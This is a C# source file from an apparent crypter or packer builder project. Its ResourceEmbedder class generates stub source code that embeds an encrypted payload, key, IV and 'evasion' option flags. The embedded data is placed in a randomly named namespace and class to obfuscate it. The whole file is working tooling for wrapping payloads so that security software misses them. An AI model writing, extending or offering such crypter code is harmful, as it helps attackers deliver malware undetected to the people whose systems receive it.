using System;
using System.Text;
using NRE.Core.Common;
using NRE.Core.Evasion;

namespace NRE.Builder.Utilities
{
/// <summary>
/// Generates the C# source file that embeds encrypted payload, key, IV, and config into the stub.
/// Obfuscation: real data lives in a random namespace/class; NRE.Stub.Embedded.EmbeddedData forwards to it.
/// </summary>
public static class ResourceEmbedder
{
    private static readonly Random Rng = new Random();

    public static string GenerateEmbeddedDataClass(
        byte[] encryptedPayload,
        byte[] key,
        byte[] iv,
        PayloadType payloadType,
        CompressionFormat compressionFormat,
        EvasionOptions evasion)
    {
        string nsSuffix = "E" + Rng.Next(0x10000000, int.MaxValue).ToString("X8");
        string dataClass = "C" + Rng.Next(0x1000, 0x10000).ToString("X4");
        string fullDataClass = "NRE.Stub." + nsSuffix + "." + dataClass;

        var sb = new StringBuilder();
        sb.AppendLine("// Auto-generated by NRE.Builder - do not edit");
        sb.AppendLine("namespace NRE.Stub." + nsSuffix);
        sb.AppendLine("{");
        sb.AppendLine("public static class " + dataClass);
        sb.AppendLine("{");
        sb.AppendLine("    public static byte[] Payload { get; } = new byte[] { ");
        sb.Append(FormatByteArray(encryptedPayload));
        sb.AppendLine(" };");
        sb.AppendLine("    public static byte[] Key { get; } = new byte[] { ");
        sb.Append(FormatByteArray(key));
        sb.AppendLine(" };");
        sb.AppendLine("    public static byte[] IV { get; } = new byte[] { ");
        sb.Append(FormatByteArray(iv));
        sb.AppendLine(" };");
        sb.AppendLine("    public static NRE.Core.Common.PayloadType PayloadType { get; } = (NRE.Core.Common.PayloadType)" + (byte)payloadType + ";");
        sb.AppendLine("    public static NRE.Core.Common.CompressionFormat CompressionFormat { get; } = (NRE.Core.Common.CompressionFormat)" + (byte)compressionFormat + ";");
        sb.AppendLine("    public static NRE.Core.Evasion.EvasionOptions Evasion { get; } = (NRE.Core.Evasion.EvasionOptions)" + (uint)evasion + "u;");
        sb.AppendLine("}");
        sb.AppendLine("}");
        sb.AppendLine("namespace NRE.Stub.Embedded");
        sb.AppendLine("{");
        sb.AppendLine("public static class EmbeddedData");
        sb.AppendLine("{");
        sb.AppendLine("    public static byte[] Payload => " + fullDataClass + ".Payload;");
        sb.AppendLine("    public static byte[] Key => " + fullDataClass + ".Key;");
        sb.AppendLine("    public static byte[] IV => " + fullDataClass + ".IV;");
        sb.AppendLine("    public static NRE.Core.Common.PayloadType PayloadType => " + fullDataClass + ".PayloadType;");
        sb.AppendLine("    public static NRE.Core.Common.CompressionFormat CompressionFormat => " + fullDataClass + ".CompressionFormat;");
        sb.AppendLine("    public static NRE.Core.Evasion.EvasionOptions Evasion => " + fullDataClass + ".Evasion;");
        sb.AppendLine("}");
        sb.AppendLine("}");
        return sb.ToString();
    }

    private static string FormatByteArray(byte[] arr)
    {
        if (arr == null || arr.Length == 0) return "";
        var sb = new StringBuilder();
        for (int i = 0; i < arr.Length; i++)
        {
            if (i > 0) sb.Append(", ");
            if (i % 24 == 0 && i > 0) sb.AppendLine();
            sb.Append("0x").Append(arr[i].ToString("X2"));
        }
        return sb.ToString();
    }
}
}
